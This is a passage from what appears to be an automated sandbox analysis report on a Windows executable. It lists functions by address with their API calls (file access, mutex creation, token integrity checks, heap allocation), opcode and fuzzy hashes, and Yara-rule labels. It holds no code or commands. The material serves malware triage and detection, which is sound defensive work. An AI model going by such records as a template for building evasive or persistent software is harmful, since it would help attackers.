                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNEL32(00000001,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,0043CE77,?), ref: 0043C8C6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 871c6539889a50f90970c5e0caf0762f6fb7daf6dad9a2b3d7f48de4206ae1a9
                                                                                                                                                    • Instruction ID: bfe952dd5e617ca6c26175ed5d7b3d50306650e6962836dd384f6e1b6f87a2b6
                                                                                                                                                    • Opcode Fuzzy Hash: 871c6539889a50f90970c5e0caf0762f6fb7daf6dad9a2b3d7f48de4206ae1a9
                                                                                                                                                    • Instruction Fuzzy Hash: 8D01B1B1600704AFE3215E3998C4BA7BAD8FB19359F10413FF266E2350CBB49D409765
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0045CA4C, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 0045CA6D
                                                                                                                                                      • Part of subcall function 004587A6: RtlAllocateHeap.NTDLL(00000000,?,?,?,0043FE6B,?,?,00000000,?,?,0040A242,?,?,?,?,0040A2DA), ref: 004587D8
                                                                                                                                                    • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,0045F451,?,00000004,?,?,?,?,0045337F,?,?), ref: 0045CAA9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1482568997-0
                                                                                                                                                    • Opcode ID: 9a33b08ffb2140c6d3fb75da734b433d8ec1332e3a260b009ae6e7584668cbd6
                                                                                                                                                    • Instruction ID: 07b9cf1f025fd764fb3d4d540daa025adc70ac0e6c1a2e8789a2173184d937a3
                                                                                                                                                    • Opcode Fuzzy Hash: 9a33b08ffb2140c6d3fb75da734b433d8ec1332e3a260b009ae6e7584668cbd6
                                                                                                                                                    • Instruction Fuzzy Hash: F8F0C8311413197F9B21EA725C44B6B2F58AF92767B11412BFC15A6293DF6CCC0981AE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434B18, Relevance: 3.0, APIs: 2, Instructions: 38synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenMutexA.KERNEL32 ref: 00434B59
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00434B66
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Mutex$CreateOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4030545807-0
                                                                                                                                                    • Opcode ID: 02b60eb7902de2a55af9107c4fb66958440d007f7ad6ddaf5131b08e575d261d
                                                                                                                                                    • Instruction ID: afde1ad46db7fdeb4f6bb099b587d5c22eac24fea1ea8fe3b4598f8aada0496c
                                                                                                                                                    • Opcode Fuzzy Hash: 02b60eb7902de2a55af9107c4fb66958440d007f7ad6ddaf5131b08e575d261d
                                                                                                                                                    • Instruction Fuzzy Hash: DFF059205042986A9B016BF91C459FFBF6CEE5B288B00216EE95192113F7A4E98582E9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040BFCD, Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040BFD9
                                                                                                                                                      • Part of subcall function 0043DA6F: FindNextFileW.KERNEL32(?,?,?,0040BC6B,?,?,?,?,?,?,?,?,00000000), ref: 0043DA78
                                                                                                                                                    • ___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0040BFEB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 478157137-0
                                                                                                                                                    • Opcode ID: 427678760cd6ab3f9f5dbd09e3aadf24167b37e4bf659fa2ba59872ffddb012e
                                                                                                                                                    • Instruction ID: bd75b3772b0b85d446f7b044b3d4643d1f31f9224bac62d992e93bfc0bed02e3
                                                                                                                                                    • Opcode Fuzzy Hash: 427678760cd6ab3f9f5dbd09e3aadf24167b37e4bf659fa2ba59872ffddb012e
                                                                                                                                                    • Instruction Fuzzy Hash: D4E04F71104106F6DB106A53DD019AB3B29FE90398B111036F809A7651EB7AED629698
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043D6D4, Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,0043D9BE,?,0040C8BF,00000000,?,?,?,?,0040C8BF,?), ref: 0043D6E4
                                                                                                                                                    • GetLastError.KERNEL32(?,0043D9BE,?,0040C8BF,00000000,?), ref: 0043D6FA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CopyErrorFileLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 374144340-0
                                                                                                                                                    • Opcode ID: 3198a5a032347915ed021b5f038af2f7ba59406b219d276802540f59e9ba02ef
                                                                                                                                                    • Instruction ID: bcc1668b1dabb35c878109841c047b20ca744b630363da331a77e54bd92e0ada
                                                                                                                                                    • Opcode Fuzzy Hash: 3198a5a032347915ed021b5f038af2f7ba59406b219d276802540f59e9ba02ef
                                                                                                                                                    • Instruction Fuzzy Hash: 51E08630504189BFDB018BA5DC09F6F7FE9AF15304F14C058F854C5151EBB4D541D765
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00428F29, Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 9e9132bf74e3fb956089ee1641cfd094e202e035d89fb4090d319abfb4cfae25
                                                                                                                                                    • Instruction ID: b9bbd52bd65f197c971621217de884018e26f918c9db972063f11b4dba4dc416
                                                                                                                                                    • Opcode Fuzzy Hash: 9e9132bf74e3fb956089ee1641cfd094e202e035d89fb4090d319abfb4cfae25
                                                                                                                                                    • Instruction Fuzzy Hash: B5818B70D012AC8BDB01DFA9DA811ECFBB0BF69304F50926ED49477262DB740B89CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041168F, Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 45e57e0ea8006c0fe94f173564c9fb6ac324c14cec4142a86cc5dba1abf9642d
                                                                                                                                                    • Instruction ID: 48a91e98c5133a482f241742a1db482d5be7fb66c1c3846f0b8a96ac560fce21
                                                                                                                                                    • Opcode Fuzzy Hash: 45e57e0ea8006c0fe94f173564c9fb6ac324c14cec4142a86cc5dba1abf9642d
                                                                                                                                                    • Instruction Fuzzy Hash: 83517F71D00619DFCB14DFA9C4909EEFBB5FF44315F20426EE512A3290D739AA85CB64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00413FB7, Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: f4a8cb5714ae0c0d735d2f5158abd9a31a51068309d13de415285817692c501b
                                                                                                                                                    • Instruction ID: 03ffab27fe5be09d37d28146e967a25e8a36476422559e1ac4696e8aea3a399c
                                                                                                                                                    • Opcode Fuzzy Hash: f4a8cb5714ae0c0d735d2f5158abd9a31a51068309d13de415285817692c501b
                                                                                                                                                    • Instruction Fuzzy Hash: CD51A174A05505DFCB24CFAAC9C08EEBBF1BF8C724B24065AE6259B391C735D980CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411EA7, Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 900bee44edcc23ae882199fbcaaeba073eb92b035c1dc4306aaf47c40a7e00a0
                                                                                                                                                    • Instruction ID: ba7a63c1f6cb8d7cfd797e77b93917ba0d94f4dba74c1823af67fd1235426f08
                                                                                                                                                    • Opcode Fuzzy Hash: 900bee44edcc23ae882199fbcaaeba073eb92b035c1dc4306aaf47c40a7e00a0
                                                                                                                                                    • Instruction Fuzzy Hash: D2410874604705DFCB25CF68C18099ABBF1FF49314B1086AAE9568BBA0E734B941CB54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C805, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0041C62D: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041C81C,00000002,?,00000000,00000244,?,?,0041C94F,?,00000000,00000244), ref: 0041C660
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000000,00000244,?,?,0041C94F,?,00000000,00000244), ref: 0041C835
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: d93b7f560c58f49250c6cad990bf4f1729d15b466befc0b345fd453017c9fd19
                                                                                                                                                    • Instruction ID: 85c121a5865040c939e3076afa0b7b3e97edec3c6ee54a9e779622b91a502783
                                                                                                                                                    • Opcode Fuzzy Hash: d93b7f560c58f49250c6cad990bf4f1729d15b466befc0b345fd453017c9fd19
                                                                                                                                                    • Instruction Fuzzy Hash: 8B31E0B1E44205ABEB14DAA9CCC07EEBBA5AB41324F20416FE551E7381DA789DC18748
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00433F5C, Relevance: 1.6, APIs: 1, Instructions: 94comCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CoCreateInstance.OLE32(0046BCF0,00000000,00000001,0046BCC0,?), ref: 00433F7F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 542301482-0
                                                                                                                                                    • Opcode ID: acc1a9e73af854839683fabde2bc9a6cbe348addf0023218d824daaf96fb0c30
                                                                                                                                                    • Instruction ID: c19721b4a86bc59ab85d4c9393ec00c3d113055cf3154eede468d622f04af7a0
                                                                                                                                                    • Opcode Fuzzy Hash: acc1a9e73af854839683fabde2bc9a6cbe348addf0023218d824daaf96fb0c30
                                                                                                                                                    • Instruction Fuzzy Hash: EF317F71600219ABDB14DB99DD49EDB7BBCEF89754F10009AF508DB250EB34EE40CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00437D6A, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00437D6F
                                                                                                                                                      • Part of subcall function 00414A54: __EH_prolog.LIBCMT ref: 00414A59
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 8577c349f0273c34788239748309ffbb3a515c382908ac07a9fa9822c1070646
                                                                                                                                                    • Instruction ID: 7dec2a361b0bf92903186cb6c505d190650fac7db2b50875f2875fa545a1a534
                                                                                                                                                    • Opcode Fuzzy Hash: 8577c349f0273c34788239748309ffbb3a515c382908ac07a9fa9822c1070646
                                                                                                                                                    • Instruction Fuzzy Hash: 6E31B3B0A08244DFCB24DFA9C491AADBBB4AF48324F24515FE15697381CB788E45CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00420C46, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00420C4B
                                                                                                                                                      • Part of subcall function 004378AC: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 004378BE
                                                                                                                                                      • Part of subcall function 004378AC: OpenProcessToken.ADVAPI32(00000000), ref: 004378C5
                                                                                                                                                      • Part of subcall function 004378AC: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004378DF
                                                                                                                                                      • Part of subcall function 004378AC: GetLastError.KERNEL32 ref: 004378E9
                                                                                                                                                      • Part of subcall function 004378AC: GlobalAlloc.KERNEL32(00000040,00000000), ref: 004378F9
                                                                                                                                                      • Part of subcall function 004378AC: GetTokenInformation.KERNELBASE(?,TokenIntegrityLevel,00000000,00000000,00000000), ref: 0043790D
                                                                                                                                                      • Part of subcall function 004378AC: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00437921
                                                                                                                                                      • Part of subcall function 004378AC: GlobalFree.KERNEL32 ref: 00437941
                                                                                                                                                      • Part of subcall function 0041DD0B: __EH_prolog.LIBCMT ref: 0041DD10
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Token$GlobalH_prologInformationProcess$AllocConvertCurrentErrorFreeLastOpenString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2888657697-0
                                                                                                                                                    • Opcode ID: ab3291abcd96024bdd3648c36de92885e97a669954706f66b72597516fbf0530
                                                                                                                                                    • Instruction ID: 0479f1e63a593a7e72d44b8bf8f2f99d9faed0af4990fa10b2e4c1e0279dd8f1
                                                                                                                                                    • Opcode Fuzzy Hash: ab3291abcd96024bdd3648c36de92885e97a669954706f66b72597516fbf0530
                                                                                                                                                    • Instruction Fuzzy Hash: FE315970E00219EFCB08EFE5D4915EEFBB0BF44308F50455EE80167242DB786A89CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00412FD4, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 7a5f8566ca86b956596256f3c5afd7616689527690b5c380f3a5ae8b161777a1
                                                                                                                                                    • Instruction ID: 7207e92c7bff261e7491ab0edf336f74bad9f94772bafd355d3c8e05ba48ce42
                                                                                                                                                    • Opcode Fuzzy Hash: 7a5f8566ca86b956596256f3c5afd7616689527690b5c380f3a5ae8b161777a1
                                                                                                                                                    • Instruction Fuzzy Hash: 5E218E756007008FDB25CF29C080AABBBF2FF89300F14856ED81697B09D378E941CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0043CBAB, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,0043D211,?,00004000), ref: 0043CC16
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: e80a34a043f75c4b81dde933980540e98d531efd2baa01c45a4dd2015158ef2a
                                                                                                                                                    • Instruction ID: 8445e9bacd770bad4a75a95ff4c7fcca31f55bb62e38c33b40b4dc43998b2802
                                                                                                                                                    • Opcode Fuzzy Hash: e80a34a043f75c4b81dde933980540e98d531efd2baa01c45a4dd2015158ef2a
                                                                                                                                                    • Instruction Fuzzy Hash: D111BF31600519FFDB15DF25C884A9ABBA4FF08764F10911AF869A7610DB34FD60DBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00414FB2, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0040A2D5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2807920213-0
                                                                                                                                                    • Opcode ID: 139466155f4fd71b0574ac1755821edf53c6ca843b256444786d21890b02404c
                                                                                                                                                    • Instruction ID: d25a920a7616dbe04ffcf28cc6a6de1fe0502068f48e3913e5246e57a086de24
                                                                                                                                                    • Opcode Fuzzy Hash: 139466155f4fd71b0574ac1755821edf53c6ca843b256444786d21890b02404c
                                                                                                                                                    • Instruction Fuzzy Hash: FAF02631900708678B14BAA6E806D9F7B5C8E00718B50007FB50897382EB39D91183DD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004595B4, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                    • Opcode ID: a9002cddfae40404c7b1b910f083549ae69e93297049940ec96a3cb955b2e5db
                                                                                                                                                    • Instruction ID: cd504686b3d0213e44a0cead57364c5aea746beb04eea5f40bb9e776e8a73a92
                                                                                                                                                    • Opcode Fuzzy Hash: a9002cddfae40404c7b1b910f083549ae69e93297049940ec96a3cb955b2e5db
                                                                                                                                                    • Instruction Fuzzy Hash: 48111871A0410AAFCB05DF58E94199F7BF4EF48304F05406AF805EB352D675EE15CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C62D, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041C81C,00000002,?,00000000,00000244,?,?,0041C94F,?,00000000,00000244), ref: 0041C660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                    • Opcode ID: 2fd562e9eef85752247c80b5da90875c94c2f830eb95c66ec53079725c88e29a
                                                                                                                                                    • Instruction ID: 8e88542ba270cc34d147d35496170ee464e022cfe45b02a537f73cfd917976a7
                                                                                                                                                    • Opcode Fuzzy Hash: 2fd562e9eef85752247c80b5da90875c94c2f830eb95c66ec53079725c88e29a
                                                                                                                                                    • Instruction Fuzzy Hash: 8D0162706C4200AFEF248A188CC1FF637999B72758F34985BE009C9252D22AC8C39F5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004145DD, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Deallocate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1075933841-0
                                                                                                                                                    • Opcode ID: af9b1a9ac82c067522f58a00f1e8b8c7968e25e919ae3d22a5931ebb6114483e
                                                                                                                                                    • Instruction ID: 2defd178637f15554097307c45baddadeddeaa903e453d11e2b9d0d977738b43
                                                                                                                                                    • Opcode Fuzzy Hash: af9b1a9ac82c067522f58a00f1e8b8c7968e25e919ae3d22a5931ebb6114483e
                                                                                                                                                    • Instruction Fuzzy Hash: 0B01F7B1500205BFD714AF59D88189EB7ECFF49354B10012FF508C3241DB74AD5087B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00422AED, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3519838083-0
                                                                                                                                                    • Opcode ID: 398b1042405b47bfb2bf1e1ff8adbd4ff5eca19c59969c889f1224a38071c026
                                                                                                                                                    • Instruction ID: 02d1ff08c125a1cd8d254685052de654fb3bcdd0cedc1153c74528710329ef08
                                                                                                                                                    • Opcode Fuzzy Hash: 398b1042405b47bfb2bf1e1ff8adbd4ff5eca19c59969c889f1224a38071c026
                                                                                                                                                    • Instruction Fuzzy Hash: 6001ADB2A00254AFCB11EFA9D8016DEFBF8EF54304F10452FE445E3242EBB85A498B59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041C698, Relevance: 1.5, APIs: 1, Instructions: 48fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNEL32(000000FF,00000244,00000000,00000000,00000000,?,0000FFFF,00000244,?,0041C8C0,00000001,00000000,?,00000000,00000244), ref: 0041C6BE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: da8e7610f96b759e5198375cce19387ec94cfa5bd8fc78f28a358e29bbf8aa85
                                                                                                                                                    • Instruction ID: 6b852a559ff21cfac2c893850c7d86ef55916ac2a59142c8e069f545ba6e0785
                                                                                                                                                    • Opcode Fuzzy Hash: da8e7610f96b759e5198375cce19387ec94cfa5bd8fc78f28a358e29bbf8aa85
                                                                                                                                                    • Instruction Fuzzy Hash: 74015A72600105BFE708CF49DC91AAAB7BAFB94354F14822AF40597651E3B0BD908BD5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00443ACC, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 40584fba6ddefbdefc0a4a4a34d78171fd6abe6f5d34fd1a49f46288f74de9c3
                                                                                                                                                    • Instruction ID: 35656095c87ddf2530701c981632824f207d0838e085116230781eac5e254368
                                                                                                                                                    • Opcode Fuzzy Hash: 40584fba6ddefbdefc0a4a4a34d78171fd6abe6f5d34fd1a49f46288f74de9c3
                                                                                                                                                    • Instruction Fuzzy Hash: 5BF02632501A6016FA312E6B8C05B5B3298CF9173BF11030BF864931C3CA7CA90A869E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041DB96, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0041DB9B
                                                                                                                                                      • Part of subcall function 0041D2E0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,0041DBDE,?,?,00000244,00486A80,00000000,004868B8,?,0041DF28), ref: 0041D2FF
                                                                                                                                                      • Part of subcall function 0041D2E0: _strlen.LIBCMT ref: 0041D306
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectoryH_prolog_strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1906034785-0
                                                                                                                                                    • Opcode ID: b8574dd888be45ad73d14acab3cbb4abcd8fb4b07514eb4b2ee44675a4404e8c
                                                                                                                                                    • Instruction ID: 7d80e886717d8be33e304e1ff339124a2aa63ff6e872c568d3fd8bc1c16bbf66
                                                                                                                                                    • Opcode Fuzzy Hash: b8574dd888be45ad73d14acab3cbb4abcd8fb4b07514eb4b2ee44675a4404e8c
                                                                                                                                                    • Instruction Fuzzy Hash: 8C01ACB1A01601AFD3089B7A88856ABBAA8FF45374F10472FE036D72D1DB789901C768
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00434690, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
